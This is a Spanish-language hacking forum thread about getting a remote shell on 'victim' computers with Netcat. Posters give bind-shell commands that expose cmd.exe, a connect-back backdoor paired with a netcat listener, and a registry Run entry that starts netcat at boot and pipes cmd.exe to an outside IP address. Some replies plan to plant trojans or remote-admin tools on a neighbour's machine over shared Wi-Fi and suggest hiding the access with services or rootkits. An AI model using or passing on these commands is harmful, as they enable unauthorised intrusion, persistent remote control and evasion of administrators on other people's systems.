 Autor
|
Tema: Paper: Obtener shell con Netcat (Leído 58817 veces)
|
|
zhyzura
|
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
digimax
 Desconectado
Mensajes: 5
|
Hola,
Estoy conectado a una máquina que tiene el port 135 abierto, empleo la entrada directa mediante netcat, tecleo:
nc -l -d -e cmd.exe -p 135
y
nc -vv 192.168.1.4 135
La máquina me dice:
FIJO [192.168.1.4] 135 (epmap) open
pero no puedo acceder a la shell, se me queda ahí, me deja escribir pero no me muestra que estoy en c: ni naa
Podré conseguir algo con esto y cómo, muchas gracias.
|
|
|
|
|
En línea
|
|
|
|
digimax
Desconectado
Mensajes: 5
|
Estoy de acuerdo con el Sr. tRekU, pero vamos a ver si tengo que meterle el servidor en la víctima, para ello me compilo una aplicación en vb que me meta la .dll de radmin2.1 el server y el .bat.
Porque si a mi víctima le tengo que meter un .exe de netcat, para ello prefiero meterle directamente el radmin que además ya lo tengo instalado en mi pc, que lo utilizo habitualmente en mi trabajo.
No existe otra manera de acceder al disco duro de mi víctima.
Estamos en una red wireless vecina y la víctima tiene carpetas compartidas, lo cuál me permite coger esos archivos lógicamente, pero no puedo mandarle nada a esa carpeta.
¿La única manera es insertarle un .exe en su pc? Como lo puedo hacer remotamente.
Muchas gracias, no sé si diría algo fuera de lo normal pero es que el SR tRekU parece que se sintió verguenza ajena. Pero yo creía que no había que meterle el netcat eln la víctima, sino lo que haría directamente sería meterle un troyano y listo, para que la shell.
|
|
|
|
|
En línea
|
|
|
|
metalflap
Desconectado
Mensajes: 14
siempre al hasecho ........... the hunter is back
|
bien tengo el programa, del link que me diste bien es ovio que estoy haciendo algo mal ya que el programa queda haciendo nada talvez devari aprender a escanear puertos ya que siempre coloco el puerto 23 o 80, primero aplico el comando nc -l -d -e cmd.exe -p 23 y se queda alli por muchorato sin respuestas, la red es win2000 y si me salto el paso anterior y alico nc -vv "ip" 23 me sale "nombre pc"."servidor" ip <puerto> <telnet>: connection refused sent 0, rcvd 0: notsock y como no logro conecion y aplico el comando para escuchar, qued escuchando nada es decir nunca me da respuesta de lo q escucha queda en listening on [any] 23... entodo caso es la red de la universidad, talvez tenga alguna proteccion que evita el uso de los comandos. gracias po respoder el post anterior |
|
|
|
|
En línea
|
Metalflap
Programando para un Mejor Futuro
|
|
|
|
zhyzura
|
primero aplico el comando
nc -l -d -e cmd.exe -p 23
y se queda alli por muchorato sin respuestas, la red es win2000 ese paso lo deberas de ejecutar en el pc de la victima no el el tuyo(seguro que lo estas haciendo asi?) y si me salto el paso anterior y alico nc -vv "ip" 23 me sale "nombre pc"."servidor" ip <puerto> <telnet>: connection refused sent 0, rcvd 0: notsock te aparece eso por que no hay nigun programa a la escucha en el puerto de la ip que pusiste. seguramente estas realizando todos los pasos en un solo pc y en realidad se ejecutan en pcs distintas. |
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
psykohaxor
Desconectado
Mensajes: 2
|
oye Zhyzura tu paper esta pero que arde, muy buena y completa. Yo tambien uso el netcat pero lo hago funcionar como escucha a los puertos de backdoors como el connect Back que sirve para saltar firewalls. Entonces lo que hago es: subo mi backdoor en el servidor ./backdoor <ip> <port> ./backdoor 127.0.0.1 80 y dejo en escucha mi netcat a ese puerto: nc> -lvvp 80 y ahi recibo mi shell  bueno un saludo enorme |
|
|
|
|
En línea
|
|
|
|
Isirius
Wiki
Desconectado
Mensajes: 2.361
|
psykohaxor no entiendo eso del backdoor qeu haces se lo que es pero como haces eso me lo puedes exlicar por favor.
|
|
|
|
|
En línea
|
 Vendo componentes de hardware, pantallas, portátiles, etc. Al mejor precio. La Web está en construcción preguntar por privado en el foro para comprar o pedir precios. |
|
|
qwertyou
Desconectado
Mensajes: 3
|
Weno este es mi primer post en el foro y espero q no el ultimo. Decir q no es la primera vez q leo vuestros reply's, xo nunca me ha surgido nada q preguntar. Total .....
Q yo me sigo preguntando xq quereis tener una shell a una makina si ya teneis acceso a ella?? Esq no me acaba de cuadrar la cosa, no.
A ver, yo tengo acceso fisico a 10 portatiles y aparte de eso tengo acceso a los pc's de la sala de informatica, los cuales no estan para nada monitorizados.
En fin, de q me sirve meter/configurar/utilizar el método netcat cuando puedo simplemente meterle el vnc y a correr. Es mas, le puedo enxufar hasta las conexiones remotas (winXP Pro) y usar Terminal Server.
Para no rallar mas... Por qué si vosotros teneis acceso a pc's (fisico, mediante exploits, pc's publicos) seguis queriendo usar netcat? por que por que por que???
|
|
|
|
|
En línea
|
|
|
|
Luisete
Desconectado
Mensajes: 3
|
Bueno ya me he ledio todo el tema, ahora voy a hacer mis comentarios... SIN ROLLOS primero lugar muy interesante toda la info. Para que sirve Net cat si puedes instalar VNC????... La respuesta creo que es muy facil, muchas veces no tiene acceso al router/firewall con lo cual no puedes mapear puertos al pc de la victima, con lo que es una muy buena opcion para tener una shell, ya que no podrias utilizar ni VNC y Tserver... Felicitaciones a todos los foreros... De elhacker.... Otra pregunta, Alguien sabe como correr el xploit en C posteado anterior mente? zhyzura Tu habias dicho que lo habias echo funcionar?... como va el tema?... no domino mucho el tema de xplotis |
|
|
|
|
En línea
|
|
|
|
Luisete
Desconectado
Mensajes: 3
|
He estado pensando y lo de programar un at para la conexion de Netcat es una buena idea, pero cualquier administrador de sistema podria verlo simplente viendo las tareas programadas del sistema, lo bueno seria poder programar un servicio de windows para qeu realize dicha operacion.
Esto o bien se puede programar en Vicual C o con Visual Studio .Net A ver quien sabe hacerlo por que no no tengo ni idea. Yo pongo la idea... jejej...y si alguien sabe como crear servicios ocultos ya seria la re leche..
Saludos!
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
pues si crees que el administrador lo detectaria de esa forma que tal si instalas un rootkit y de esa manera lo ocultas (recuerda que los rootkits hacen maravillas).
asi ya veras si te detecta tu netcat...
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
Snake-Saks
Desconectado
Mensajes: 52
|
hola que tal al intentar poner esto nc.exe –l –vv –p 80 < c:index.html me pone el siguiente mensaje:
ûl: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND--- a que se debe esto
|
|
|
|
|
En línea
|
|
|
|
Snake-Saks
Desconectado
Mensajes: 52
|
en lo responden mi otra duada, aqui pongo otra, bueno es la diguiente todos estos pasos de hacen desde mi computadora o tengo que ir a la computadora victima y añadir algo al registro, gracias
|
|
|
|
|
En línea
|
|
|
|
JeRoS
Desconectado
Mensajes: 738
|
Ese error puede ser xq al host que queres entrar no está conectado.
Saludos
|
|
|
|
|
En línea
|
Podran imitar a elhacker.net, pero igualarlo jamas... jajaja
|
|
|
firewer
Desconectado
Mensajes: 120
|
Veamos, tengo mi pc a la escuxa del puerto 25 y 80, tengo a mi victima con el netcat instalado y con esta entrada en su registro:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windows /t REG_SZ /d "C:\windows\system32\nc -d 80.37.0.3| cmd.exe | nc -d 80.37.0.3"
Bien al arrancar su pc se conectaria a mi pc, pero ai un problema que nadie a comentado, mi victima usa tarjeta inalambrica y tarda entre 60 y 120 segundos aproximadamente en conectarse ainternet, por lo tanto
Su netcat a intentado conectarse a mi antes de que tuviera conexion a internet, y ya no vuelve a intentarlo.
Tiene esto solucion?
|
|
|
|
|
En línea
|
|
|
|
|
 |
